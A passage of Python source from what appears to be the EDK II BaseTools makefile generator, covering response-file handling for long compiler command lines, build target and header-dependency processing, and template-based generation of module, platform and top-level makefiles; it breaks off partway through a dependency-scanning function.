def ReplaceMacro(self, str):
for Macro in self.MacroList:
if self._AutoGenObject.Macros[Macro] and self._AutoGenObject.Macros[Macro] in str:
str = str.replace(self._AutoGenObject.Macros[Macro], '$(' + Macro + ')')
return str
def CommandExceedLimit(self):
FlagDict = {
'CC' : { 'Macro' : '$(CC_FLAGS)', 'Value' : False},
'PP' : { 'Macro' : '$(PP_FLAGS)', 'Value' : False},
'APP' : { 'Macro' : '$(APP_FLAGS)', 'Value' : False},
'ASLPP' : { 'Macro' : '$(ASLPP_FLAGS)', 'Value' : False},
'VFRPP' : { 'Macro' : '$(VFRPP_FLAGS)', 'Value' : False},
'ASM' : { 'Macro' : '$(ASM_FLAGS)', 'Value' : False},
'ASLCC' : { 'Macro' : '$(ASLCC_FLAGS)', 'Value' : False},
}
RespDict = {}
FileTypeList = []
IncPrefix = self._INC_FLAG_[self._AutoGenObject.ToolChainFamily]
# base on the source files to decide the file type
for File in self._AutoGenObject.SourceFileList:
for type in self._AutoGenObject.FileTypes:
if File in self._AutoGenObject.FileTypes[type]:
if type not in FileTypeList:
FileTypeList.append(type)
# calculate the command-line length
if FileTypeList:
for type in FileTypeList:
BuildTargets = self._AutoGenObject.BuildRules[type].BuildTargets
for Target in BuildTargets:
CommandList = BuildTargets[Target].Commands
for SingleCommand in CommandList:
Tool = ''
SingleCommandLength = len(SingleCommand)
SingleCommandList = SingleCommand.split()
if len(SingleCommandList) > 0:
for Flag in FlagDict:
if '$('+ Flag +')' in SingleCommandList[0]:
Tool = Flag
break
if Tool:
if 'PATH' not in self._AutoGenObject.BuildOption[Tool]:
EdkLogger.error("build", AUTOGEN_ERROR, "%s_PATH doesn't exist in %s ToolChain and %s Arch." %(Tool, self._AutoGenObject.ToolChain, self._AutoGenObject.Arch), ExtraData="[%s]" % str(self._AutoGenObject))
SingleCommandLength += len(self._AutoGenObject.BuildOption[Tool]['PATH'])
for item in SingleCommandList[1:]:
if FlagDict[Tool]['Macro'] in item:
if 'FLAGS' not in self._AutoGenObject.BuildOption[Tool]:
EdkLogger.error("build", AUTOGEN_ERROR, "%s_FLAGS doesn't exist in %s ToolChain and %s Arch." %(Tool, self._AutoGenObject.ToolChain, self._AutoGenObject.Arch), ExtraData="[%s]" % str(self._AutoGenObject))
Str = self._AutoGenObject.BuildOption[Tool]['FLAGS']
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Str.find(Option + '_' + Attr) != -1:
Str = Str.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while(Str.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Str.find(MacroName) != -1):
Str = Str.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
SingleCommandLength += len(Str)
elif '$(INC)' in item:
SingleCommandLength += self._AutoGenObject.IncludePathLength + len(IncPrefix) * len(self._AutoGenObject.IncludePathList)
elif item.find('$(') != -1:
Str = item
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Str.find(Option + '_' + Attr) != -1:
Str = Str.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while(Str.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Str.find(MacroName) != -1):
Str = Str.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
SingleCommandLength += len(Str)
if SingleCommandLength > GlobalData.gCommandMaxLength:
FlagDict[Tool]['Value'] = True
# generate the response file content by combine the FLAGS and INC
for Flag in FlagDict:
if FlagDict[Flag]['Value']:
Key = Flag + '_RESP'
RespMacro = FlagDict[Flag]['Macro'].replace('FLAGS', 'RESP')
Value = self._AutoGenObject.BuildOption[Flag]['FLAGS']
for inc in self._AutoGenObject.IncludePathList:
Value += ' ' + IncPrefix + inc
for Option in self._AutoGenObject.BuildOption:
for Attr in self._AutoGenObject.BuildOption[Option]:
if Value.find(Option + '_' + Attr) != -1:
Value = Value.replace('$(' + Option + '_' + Attr + ')', self._AutoGenObject.BuildOption[Option][Attr])
while (Value.find('$(') != -1):
for macro in self._AutoGenObject.Macros:
MacroName = '$('+ macro + ')'
if (Value.find(MacroName) != -1):
Value = Value.replace(MacroName, self._AutoGenObject.Macros[macro])
break
else:
break
if self._AutoGenObject.ToolChainFamily == 'GCC':
RespDict[Key] = Value.replace('\\', '/')
else:
RespDict[Key] = Value
for Target in BuildTargets:
for i, SingleCommand in enumerate(BuildTargets[Target].Commands):
if FlagDict[Flag]['Macro'] in SingleCommand:
BuildTargets[Target].Commands[i] = SingleCommand.replace('$(INC)', '').replace(FlagDict[Flag]['Macro'], RespMacro)
return RespDict
def ProcessBuildTargetList(self):
#
# Search dependency file list for each source file
#
ForceIncludedFile = []
for File in self._AutoGenObject.AutoGenFileList:
if File.Ext == '.h':
ForceIncludedFile.append(File)
SourceFileList = []
OutPutFileList = []
for Target in self._AutoGenObject.IntroTargetList:
SourceFileList.extend(Target.Inputs)
OutPutFileList.extend(Target.Outputs)
if OutPutFileList:
for Item in OutPutFileList:
if Item in SourceFileList:
SourceFileList.remove(Item)
FileDependencyDict = {item:ForceIncludedFile for item in SourceFileList}
for Dependency in FileDependencyDict.values():
self.DependencyHeaderFileSet.update(set(Dependency))
# Get a set of unique package includes from MetaFile
parentMetaFileIncludes = set()
for aInclude in self._AutoGenObject.PackageIncludePathList:
aIncludeName = str(aInclude)
parentMetaFileIncludes.add(aIncludeName.lower())
# Check if header files are listed in metafile
# Get a set of unique module header source files from MetaFile
headerFilesInMetaFileSet = set()
for aFile in self._AutoGenObject.SourceFileList:
aFileName = str(aFile)
if not aFileName.endswith('.h'):
continue
headerFilesInMetaFileSet.add(aFileName.lower())
# Get a set of unique module autogen files
localAutoGenFileSet = set()
for aFile in self._AutoGenObject.AutoGenFileList:
localAutoGenFileSet.add(str(aFile).lower())
# Get a set of unique module dependency header files
# Exclude autogen files and files not in the source directory
# and files that are under the package include list
headerFileDependencySet = set()
localSourceDir = str(self._AutoGenObject.SourceDir).lower()
for Dependency in FileDependencyDict.values():
for aFile in Dependency:
aFileName = str(aFile).lower()
# Exclude non-header files
if not aFileName.endswith('.h'):
continue
# Exclude autogen files
if aFileName in localAutoGenFileSet:
continue
# Exclude include out of local scope
if localSourceDir not in aFileName:
continue
# Exclude files covered by package includes
pathNeeded = True
for aIncludePath in parentMetaFileIncludes:
if aIncludePath in aFileName:
pathNeeded = False
break
if not pathNeeded:
continue
# Keep the file to be checked
headerFileDependencySet.add(aFileName)
# Check if a module dependency header file is missing from the module's MetaFile
for aFile in headerFileDependencySet:
if aFile in headerFilesInMetaFileSet:
continue
if GlobalData.gUseHashCache:
GlobalData.gModuleBuildTracking[self._AutoGenObject] = 'FAIL_METAFILE'
EdkLogger.warn("build","Module MetaFile [Sources] is missing local header!",
ExtraData = "Local Header: " + aFile + " not found in " + self._AutoGenObject.MetaFile.Path
)
for File,Dependency in FileDependencyDict.items():
if not Dependency:
continue
self._AutoGenObject.AutoGenDepSet |= set(Dependency)
CmdSumDict = {}
CmdTargetDict = {}
CmdCppDict = {}
DependencyDict = FileDependencyDict.copy()
# Convert target description object to target string in makefile
if self._AutoGenObject.BuildRuleFamily == TAB_COMPILER_MSFT and TAB_C_CODE_FILE in self._AutoGenObject.Targets:
for T in self._AutoGenObject.Targets[TAB_C_CODE_FILE]:
NewFile = self.PlaceMacro(str(T), self.Macros)
if not self.ObjTargetDict.get(T.Target.SubDir):
self.ObjTargetDict[T.Target.SubDir] = set()
self.ObjTargetDict[T.Target.SubDir].add(NewFile)
for Type in self._AutoGenObject.Targets:
for T in self._AutoGenObject.Targets[Type]:
# Generate related macros if needed
if T.GenFileListMacro and T.FileListMacro not in self.FileListMacros:
self.FileListMacros[T.FileListMacro] = []
if T.GenListFile and T.ListFileMacro not in self.ListFileMacros:
self.ListFileMacros[T.ListFileMacro] = []
if T.GenIncListFile and T.IncListFileMacro not in self.ListFileMacros:
self.ListFileMacros[T.IncListFileMacro] = []
Deps = []
CCodeDeps = []
# Add force-dependencies
for Dep in T.Dependencies:
Deps.append(self.PlaceMacro(str(Dep), self.Macros))
if Dep != '$(MAKE_FILE)':
CCodeDeps.append(self.PlaceMacro(str(Dep), self.Macros))
# Add inclusion-dependencies
if len(T.Inputs) == 1 and T.Inputs[0] in FileDependencyDict:
for F in FileDependencyDict[T.Inputs[0]]:
Deps.append(self.PlaceMacro(str(F), self.Macros))
# Add source-dependencies
for F in T.Inputs:
NewFile = self.PlaceMacro(str(F), self.Macros)
# In order to use file list macro as dependency
if T.GenListFile:
# gnu tools need forward slash path separator, even on Windows
self.ListFileMacros[T.ListFileMacro].append(str(F).replace ('\\', '/'))
self.FileListMacros[T.FileListMacro].append(NewFile)
elif T.GenFileListMacro:
self.FileListMacros[T.FileListMacro].append(NewFile)
else:
Deps.append(NewFile)
for key in self.FileListMacros:
self.FileListMacros[key].sort()
# Use file list macro as dependency
if T.GenFileListMacro:
Deps.append("$(%s)" % T.FileListMacro)
if Type in [TAB_OBJECT_FILE, TAB_STATIC_LIBRARY]:
Deps.append("$(%s)" % T.ListFileMacro)
if self._AutoGenObject.BuildRuleFamily == TAB_COMPILER_MSFT and Type == TAB_C_CODE_FILE:
T, CmdTarget, CmdTargetDict, CmdCppDict = self.ParserCCodeFile(T, Type, CmdSumDict, CmdTargetDict, CmdCppDict, DependencyDict)
TargetDict = {"target": self.PlaceMacro(T.Target.Path, self.Macros), "cmd": "\n\t".join(T.Commands),"deps": CCodeDeps}
CmdLine = self._BUILD_TARGET_TEMPLATE.Replace(TargetDict).rstrip().replace('\t$(OBJLIST', '$(OBJLIST')
if T.Commands:
CmdLine = '%s%s' %(CmdLine, TAB_LINE_BREAK)
if CCodeDeps or CmdLine:
self.BuildTargetList.append(CmdLine)
else:
TargetDict = {"target": self.PlaceMacro(T.Target.Path, self.Macros), "cmd": "\n\t".join(T.Commands),"deps": Deps}
self.BuildTargetList.append(self._BUILD_TARGET_TEMPLATE.Replace(TargetDict))
# Add a Makefile rule for targets generating multiple files.
# The main output is a prerequisite for the other output files.
for i in T.Outputs[1:]:
AnnexeTargetDict = {"target": self.PlaceMacro(i.Path, self.Macros), "cmd": "", "deps": self.PlaceMacro(T.Target.Path, self.Macros)}
self.BuildTargetList.append(self._BUILD_TARGET_TEMPLATE.Replace(AnnexeTargetDict))
def ParserCCodeFile(self, T, Type, CmdSumDict, CmdTargetDict, CmdCppDict, DependencyDict):
if not CmdSumDict:
for item in self._AutoGenObject.Targets[Type]:
CmdSumDict[item.Target.SubDir] = item.Target.BaseName
for CppPath in item.Inputs:
Path = self.PlaceMacro(CppPath.Path, self.Macros)
if CmdCppDict.get(item.Target.SubDir):
CmdCppDict[item.Target.SubDir].append(Path)
else:
CmdCppDict[item.Target.SubDir] = ['$(MAKE_FILE)', Path]
if CppPath.Path in DependencyDict:
for Temp in DependencyDict[CppPath.Path]:
try:
Path = self.PlaceMacro(Temp.Path, self.Macros)
except:
continue
if Path not in (self.CommonFileDependency + CmdCppDict[item.Target.SubDir]):
CmdCppDict[item.Target.SubDir].append(Path)
if T.Commands:
CommandList = T.Commands[:]
for Item in CommandList[:]:
SingleCommandList = Item.split()
if len(SingleCommandList) > 0 and self.CheckCCCmd(SingleCommandList):
for Temp in SingleCommandList:
if Temp.startswith('/Fo'):
CmdSign = '%s%s' % (Temp.rsplit(TAB_SLASH, 1)[0], TAB_SLASH)
break
else: continue
if CmdSign not in list(CmdTargetDict.keys()):
CmdTargetDict[CmdSign] = Item.replace(Temp, CmdSign)
else:
CmdTargetDict[CmdSign] = "%s %s" % (CmdTargetDict[CmdSign], SingleCommandList[-1])
Index = CommandList.index(Item)
CommandList.pop(Index)
if SingleCommandList[-1].endswith("%s%s.c" % (TAB_SLASH, CmdSumDict[CmdSign[3:].rsplit(TAB_SLASH, 1)[0]])):
Cpplist = CmdCppDict[T.Target.SubDir]
Cpplist.insert(0, '$(OBJLIST_%d): ' % list(self.ObjTargetDict.keys()).index(T.Target.SubDir))
T.Commands[Index] = '%s\n\t%s' % (' \\\n\t'.join(Cpplist), CmdTargetDict[CmdSign])
else:
T.Commands.pop(Index)
return T, CmdSumDict, CmdTargetDict, CmdCppDict
def CheckCCCmd(self, CommandList):
for cmd in CommandList:
if '$(CC)' in cmd:
return True
return False
## For creating makefile targets for dependent libraries
def ProcessDependentLibrary(self):
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
self.LibraryBuildDirectoryList.append(self.PlaceMacro(LibraryAutoGen.BuildDir, self.Macros))
## Return a list containing source file's dependencies
#
# @param FileList The list of source files
# @param ForceInculeList The list of files which will be included forcely
# @param SearchPathList The list of search path
#
# @retval dict The mapping between source file path and its dependencies
#
def GetFileDependency(self, FileList, ForceInculeList, SearchPathList):
Dependency = {}
for F in FileList:
Dependency[F] = GetDependencyList(self._AutoGenObject, self.FileCache, F, ForceInculeList, SearchPathList)
return Dependency
## CustomMakefile class
#
# This class encapsules makefie and its generation for module. It uses template to generate
# the content of makefile. The content of makefile will be got from ModuleAutoGen object.
#
class CustomMakefile(BuildFile):
## template used to generate the makefile for module with custom makefile
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_RELATIVE_DIR = ${platform_relative_directory}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Module Macro Definition
#
MODULE_NAME = ${module_name}
MODULE_GUID = ${module_guid}
MODULE_NAME_GUID = ${module_name_guid}
MODULE_VERSION = ${module_version}
MODULE_TYPE = ${module_type}
MODULE_FILE = ${module_file}
MODULE_FILE_BASE_NAME = ${module_file_base_name}
BASE_NAME = $(MODULE_NAME)
MODULE_RELATIVE_DIR = ${module_relative_directory}
MODULE_DIR = ${module_dir}
#
# Build Configuration Macro Definition
#
ARCH = ${architecture}
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
# PLATFORM_BUILD_DIR = ${platform_build_directory}
BUILD_DIR = ${platform_build_directory}
BIN_DIR = $(BUILD_DIR)${separator}${architecture}
LIB_DIR = $(BIN_DIR)
MODULE_BUILD_DIR = ${module_build_directory}
OUTPUT_DIR = ${module_output_directory}
DEBUG_DIR = ${module_debug_directory}
DEST_DIR_OUTPUT = $(OUTPUT_DIR)
DEST_DIR_DEBUG = $(DEBUG_DIR)
#
# Tools definitions specific to this module
#
${BEGIN}${module_tool_definitions}
${END}
MAKE_FILE = ${makefile_path}
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
${custom_makefile_content}
#
# Target used when called from platform makefile, which will bypass the build of dependent libraries
#
pbuild: init all
#
# ModuleTarget
#
mbuild: init all
#
# Build Target used in multi-thread build mode, which no init target is needed
#
tbuild: all
#
# Initialization target: print build information and create necessary directories
#
init:
\t-@echo Building ... $(MODULE_DIR)${separator}$(MODULE_FILE) [$(ARCH)]
${BEGIN}\t-@${create_directory_command}\n${END}\
''')
## Constructor of CustomMakefile
#
# @param ModuleAutoGen Object of ModuleAutoGen class
#
def __init__(self, ModuleAutoGen):
BuildFile.__init__(self, ModuleAutoGen)
self.PlatformInfo = self._AutoGenObject.PlatformInfo
self.IntermediateDirectoryList = ["$(DEBUG_DIR)", "$(OUTPUT_DIR)"]
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
Separator = self._SEP_[self._Platform]
MyAgo = self._AutoGenObject
if self._FileType not in MyAgo.CustomMakefile:
EdkLogger.error('build', OPTION_NOT_SUPPORTED, "No custom makefile for %s" % self._FileType,
ExtraData="[%s]" % str(MyAgo))
MakefilePath = mws.join(
MyAgo.WorkspaceDir,
MyAgo.CustomMakefile[self._FileType]
)
try:
CustomMakefile = open(MakefilePath, 'r').read()
except:
EdkLogger.error('build', FILE_OPEN_FAILURE, File=str(MyAgo),
ExtraData=MyAgo.CustomMakefile[self._FileType])
# tools definitions
ToolsDef = []
for Tool in MyAgo.BuildOption:
# Don't generate MAKE_FLAGS in makefile. It's put in environment variable.
if Tool == "MAKE":
continue
for Attr in MyAgo.BuildOption[Tool]:
if Attr == "FAMILY":
continue
elif Attr == "PATH":
ToolsDef.append("%s = %s" % (Tool, MyAgo.BuildOption[Tool][Attr]))
else:
ToolsDef.append("%s_%s = %s" % (Tool, Attr, MyAgo.BuildOption[Tool][Attr]))
ToolsDef.append("")
MakefileName = self.getMakefileName()
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(MODULE_BUILD_DIR)", MakefileName),
"platform_name" : self.PlatformInfo.Name,
"platform_guid" : self.PlatformInfo.Guid,
"platform_version" : self.PlatformInfo.Version,
"platform_relative_directory": self.PlatformInfo.SourceDir,
"platform_output_directory" : self.PlatformInfo.OutputDir,
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"module_name" : MyAgo.Name,
"module_guid" : MyAgo.Guid,
"module_name_guid" : MyAgo.UniqueBaseName,
"module_version" : MyAgo.Version,
"module_type" : MyAgo.ModuleType,
"module_file" : MyAgo.MetaFile,
"module_file_base_name" : MyAgo.MetaFile.BaseName,
"module_relative_directory" : MyAgo.SourceDir,
"module_dir" : mws.join (MyAgo.WorkspaceDir, MyAgo.SourceDir),
"architecture" : MyAgo.Arch,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"platform_build_directory" : self.PlatformInfo.BuildDir,
"module_build_directory" : MyAgo.BuildDir,
"module_output_directory" : MyAgo.OutputDir,
"module_debug_directory" : MyAgo.DebugDir,
"separator" : Separator,
"module_tool_definitions" : ToolsDef,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"custom_makefile_content" : CustomMakefile
}
return MakefileTemplateDict
## PlatformMakefile class
#
# This class encapsules makefie and its generation for platform. It uses
# template to generate the content of makefile. The content of makefile will be
# got from PlatformAutoGen object.
#
class PlatformMakefile(BuildFile):
## template used to generate the makefile for platform
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_FILE = ${platform_file}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Build Configuration Macro Definition
#
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
BUILD_DIR = ${platform_build_directory}
FV_DIR = ${platform_build_directory}${separator}FV
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
MAKE = ${make_path}
MAKE_FILE = ${makefile_path}
#
# Default target
#
all: init build_libraries build_modules
#
# Initialization target: print build information and create necessary directories
#
init:
\t-@echo Building ... $(PLATFORM_FILE) [${build_architecture_list}]
\t${BEGIN}-@${create_directory_command}
\t${END}
#
# library build target
#
libraries: init build_libraries
#
# module build target
#
modules: init build_libraries build_modules
#
# Build all libraries:
#
build_libraries:
${BEGIN}\t@"$(MAKE)" $(MAKE_FLAGS) -f ${library_makefile_list} pbuild
${END}\t@cd $(BUILD_DIR)
#
# Build all modules:
#
build_modules:
${BEGIN}\t@"$(MAKE)" $(MAKE_FLAGS) -f ${module_makefile_list} pbuild
${END}\t@cd $(BUILD_DIR)
#
# Clean intermediate files
#
clean:
\t${BEGIN}-@${library_build_command} clean
\t${END}${BEGIN}-@${module_build_command} clean
\t${END}@cd $(BUILD_DIR)
#
# Clean all generated files except to makefile
#
cleanall:
${BEGIN}\t${cleanall_command}
${END}
#
# Clean all library files
#
cleanlib:
\t${BEGIN}-@${library_build_command} cleanall
\t${END}@cd $(BUILD_DIR)\n
''')
## Constructor of PlatformMakefile
#
# @param ModuleAutoGen Object of PlatformAutoGen class
#
def __init__(self, PlatformAutoGen):
BuildFile.__init__(self, PlatformAutoGen)
self.ModuleBuildCommandList = []
self.ModuleMakefileList = []
self.IntermediateDirectoryList = []
self.ModuleBuildDirectoryList = []
self.LibraryBuildDirectoryList = []
self.LibraryMakeCommandList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
Separator = self._SEP_[self._Platform]
MyAgo = self._AutoGenObject
if "MAKE" not in MyAgo.ToolDefinition or "PATH" not in MyAgo.ToolDefinition["MAKE"]:
EdkLogger.error("build", OPTION_MISSING, "No MAKE command defined. Please check your tools_def.txt!",
ExtraData="[%s]" % str(MyAgo))
self.IntermediateDirectoryList = ["$(BUILD_DIR)"]
self.ModuleBuildDirectoryList = self.GetModuleBuildDirectoryList()
self.LibraryBuildDirectoryList = self.GetLibraryBuildDirectoryList()
MakefileName = self.getMakefileName()
LibraryMakefileList = []
LibraryMakeCommandList = []
for D in self.LibraryBuildDirectoryList:
D = self.PlaceMacro(D, {"BUILD_DIR":MyAgo.BuildDir})
Makefile = os.path.join(D, MakefileName)
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":Makefile}
LibraryMakefileList.append(Makefile)
LibraryMakeCommandList.append(Command)
self.LibraryMakeCommandList = LibraryMakeCommandList
ModuleMakefileList = []
ModuleMakeCommandList = []
for D in self.ModuleBuildDirectoryList:
D = self.PlaceMacro(D, {"BUILD_DIR":MyAgo.BuildDir})
Makefile = os.path.join(D, MakefileName)
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":Makefile}
ModuleMakefileList.append(Makefile)
ModuleMakeCommandList.append(Command)
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(BUILD_DIR)", MakefileName),
"make_path" : MyAgo.ToolDefinition["MAKE"]["PATH"],
"makefile_name" : MakefileName,
"platform_name" : MyAgo.Name,
"platform_guid" : MyAgo.Guid,
"platform_version" : MyAgo.Version,
"platform_file" : MyAgo.MetaFile,
"platform_relative_directory": MyAgo.SourceDir,
"platform_output_directory" : MyAgo.OutputDir,
"platform_build_directory" : MyAgo.BuildDir,
"platform_dir" : MyAgo.Macros["PLATFORM_DIR"],
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
"build_architecture_list" : MyAgo.Arch,
"architecture" : MyAgo.Arch,
"separator" : Separator,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"cleanall_command" : self.GetRemoveDirectoryCommand(self.IntermediateDirectoryList),
"library_makefile_list" : LibraryMakefileList,
"module_makefile_list" : ModuleMakefileList,
"library_build_command" : LibraryMakeCommandList,
"module_build_command" : ModuleMakeCommandList,
}
return MakefileTemplateDict
## Get the root directory list for intermediate files of all modules build
#
# @retval list The list of directory
#
def GetModuleBuildDirectoryList(self):
DirList = []
for ModuleAutoGen in self._AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, ModuleAutoGen.BuildDir))
return DirList
## Get the root directory list for intermediate files of all libraries build
#
# @retval list The list of directory
#
def GetLibraryBuildDirectoryList(self):
DirList = []
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, LibraryAutoGen.BuildDir))
return DirList
## TopLevelMakefile class
#
# This class encapsules makefie and its generation for entrance makefile. It
# uses template to generate the content of makefile. The content of makefile
# will be got from WorkspaceAutoGen object.
#
class TopLevelMakefile(BuildFile):
## template used to generate toplevel makefile
_TEMPLATE_ = TemplateString('''${BEGIN}\tGenFds -f ${fdf_file} --conf=${conf_directory} -o ${platform_build_directory} -t ${toolchain_tag} -b ${build_target} -p ${active_platform} -a ${build_architecture_list} ${extra_options}${END}${BEGIN} -r ${fd} ${END}${BEGIN} -i ${fv} ${END}${BEGIN} -C ${cap} ${END}${BEGIN} -D ${macro} ${END}''')
## Constructor of TopLevelMakefile
#
# @param Workspace Object of WorkspaceAutoGen class
#
def __init__(self, Workspace):
BuildFile.__init__(self, Workspace)
self.IntermediateDirectoryList = []
self.DependencyHeaderFileSet = set()
# Compose a dict object containing information used to do replacement in template
@property
def _TemplateDict(self):
Separator = self._SEP_[self._Platform]
# any platform autogen object is ok because we just need common information
MyAgo = self._AutoGenObject
if "MAKE" not in MyAgo.ToolDefinition or "PATH" not in MyAgo.ToolDefinition["MAKE"]:
EdkLogger.error("build", OPTION_MISSING, "No MAKE command defined. Please check your tools_def.txt!",
ExtraData="[%s]" % str(MyAgo))
for Arch in MyAgo.ArchList:
self.IntermediateDirectoryList.append(Separator.join(["$(BUILD_DIR)", Arch]))
self.IntermediateDirectoryList.append("$(FV_DIR)")
# TRICK: for not generating GenFds call in makefile if no FDF file
MacroList = []
if MyAgo.FdfFile is not None and MyAgo.FdfFile != "":
FdfFileList = [MyAgo.FdfFile]
# macros passed to GenFds
MacroDict = {}
MacroDict.update(GlobalData.gGlobalDefines)
MacroDict.update(GlobalData.gCommandLineDefines)
for MacroName in MacroDict:
if MacroDict[MacroName] != "":
MacroList.append('"%s=%s"' % (MacroName, MacroDict[MacroName].replace('\\', '\\\\')))
else:
MacroList.append('"%s"' % MacroName)
else:
FdfFileList = []
# pass extra common options to external program called in makefile, currently GenFds.exe
ExtraOption = ''
LogLevel = EdkLogger.GetLevel()
if LogLevel == EdkLogger.VERBOSE:
ExtraOption += " -v"
elif LogLevel <= EdkLogger.DEBUG_9:
ExtraOption += " -d %d" % (LogLevel - 1)
elif LogLevel == EdkLogger.QUIET:
ExtraOption += " -q"
if GlobalData.gCaseInsensitive:
ExtraOption += " -c"
if not GlobalData.gEnableGenfdsMultiThread:
ExtraOption += " --no-genfds-multi-thread"
if GlobalData.gIgnoreSource:
ExtraOption += " --ignore-sources"
for pcd in GlobalData.BuildOptionPcd:
if pcd[2]:
pcdname = '.'.join(pcd[0:3])
else:
pcdname = '.'.join(pcd[0:2])
if pcd[3].startswith('{'):
ExtraOption += " --pcd " + pcdname + '=' + 'H' + '"' + pcd[3] + '"'
else:
ExtraOption += " --pcd " + pcdname + '=' + pcd[3]
MakefileName = self.getMakefileName()
SubBuildCommandList = []
for A in MyAgo.ArchList:
Command = self._MAKE_TEMPLATE_[self._Platform] % {"file":os.path.join("$(BUILD_DIR)", A, MakefileName)}
SubBuildCommandList.append(Command)
MakefileTemplateDict = {
"makefile_header" : self._FILE_HEADER_[self._FileType],
"makefile_path" : os.path.join("$(BUILD_DIR)", MakefileName),
"make_path" : MyAgo.ToolDefinition["MAKE"]["PATH"],
"platform_name" : MyAgo.Name,
"platform_guid" : MyAgo.Guid,
"platform_version" : MyAgo.Version,
"platform_build_directory" : MyAgo.BuildDir,
"conf_directory" : GlobalData.gConfDirectory,
"toolchain_tag" : MyAgo.ToolChain,
"build_target" : MyAgo.BuildTarget,
"shell_command_code" : list(self._SHELL_CMD_[self._Platform].keys()),
"shell_command" : list(self._SHELL_CMD_[self._Platform].values()),
'arch' : list(MyAgo.ArchList),
"build_architecture_list" : ','.join(MyAgo.ArchList),
"separator" : Separator,
"create_directory_command" : self.GetCreateDirectoryCommand(self.IntermediateDirectoryList),
"cleanall_command" : self.GetRemoveDirectoryCommand(self.IntermediateDirectoryList),
"sub_build_command" : SubBuildCommandList,
"fdf_file" : FdfFileList,
"active_platform" : str(MyAgo),
"fd" : MyAgo.FdTargetList,
"fv" : MyAgo.FvTargetList,
"cap" : MyAgo.CapTargetList,
"extra_options" : ExtraOption,
"macro" : MacroList,
}
return MakefileTemplateDict
## Get the root directory list for intermediate files of all modules build
#
# @retval list The list of directory
#
def GetModuleBuildDirectoryList(self):
DirList = []
for ModuleAutoGen in self._AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, ModuleAutoGen.BuildDir))
return DirList
## Get the root directory list for intermediate files of all libraries build
#
# @retval list The list of directory
#
def GetLibraryBuildDirectoryList(self):
DirList = []
for LibraryAutoGen in self._AutoGenObject.LibraryAutoGenList:
if not LibraryAutoGen.IsBinaryModule:
DirList.append(os.path.join(self._AutoGenObject.BuildDir, LibraryAutoGen.BuildDir))
return DirList
## Find dependencies for one source file
#
# By searching recursively "#include" directive in file, find out all the
# files needed by given source file. The dependencies will be only searched
# in given search path list.
#
# @param File The source file
# @param ForceInculeList The list of files which will be included forcely
# @param SearchPathList The list of search path
#
# @retval list The list of files the given source file depends on
#
def GetDependencyList(AutoGenObject, FileCache, File, ForceList, SearchPathList):
EdkLogger.debug(EdkLogger.DEBUG_1, "Try to get dependency files for %s" % File)
FileStack = [File] + ForceList
DependencySet = set()
if AutoGenObject.Arch not in gDependencyDatabase:
gDependencyDatabase[AutoGenObject.Arch] = {}
DepDb = gDependencyDatabase[AutoGenObject.Arch]
while len(FileStack) > 0:
F = FileStack.pop()
FullPathDependList = []
if F in FileCache:
for CacheFile in FileCache[F]:
FullPathDependList.append(CacheFile)
if CacheFile not in DependencySet:
FileStack.append(CacheFile)
DependencySet.update(FullPathDependList)
continue
CurrentFileDependencyList = []
if F in DepDb:
CurrentFileDependencyList = DepDb[F]
else:
try:
